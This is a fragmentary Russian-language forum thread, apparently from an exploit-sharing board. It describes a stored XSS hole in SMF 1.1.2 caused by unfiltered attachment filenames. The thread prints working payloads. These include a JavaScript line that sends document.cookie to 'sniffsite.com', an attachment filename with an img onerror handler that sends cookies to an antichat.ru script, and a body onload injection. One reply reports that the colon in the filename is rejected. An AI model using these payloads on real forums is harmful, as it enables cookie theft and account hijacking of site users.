![]() |
Active-XSS in SMF
SMF Active XSS
(current version 1.1.2) Отсутствует фильтрация atachment filename Способы эксплуатации:
Также можно объединить 2 приведенных выше способа, прикрепив 2 файла, или добавив в smfexp.js: Код:
new Image().src='http://sniffsite.com/s.gif?'+document.cookie; |
Html Injection
Код:
<body onload=document.write(String.fromCharCode(Some char values...))>1.txt |
attachfilename<img src=. width=1 height=1 onerror=javascript:new Image().src='http://old.antichat.ru/cgi-bin/s.gif?'+document.cookie>.txt
Делаю аттач, сообщение успешно добавляется на форум. Отображается что к сообщению прикреплен файл default.htm Вот такого вот содержания Цитата:
|
У меня, когда переименовываешь файл, ругается на двоеточие, пишет нельзя делать имя файла с такими символами. Извините за архиологию.
|
| Время: 22:29 |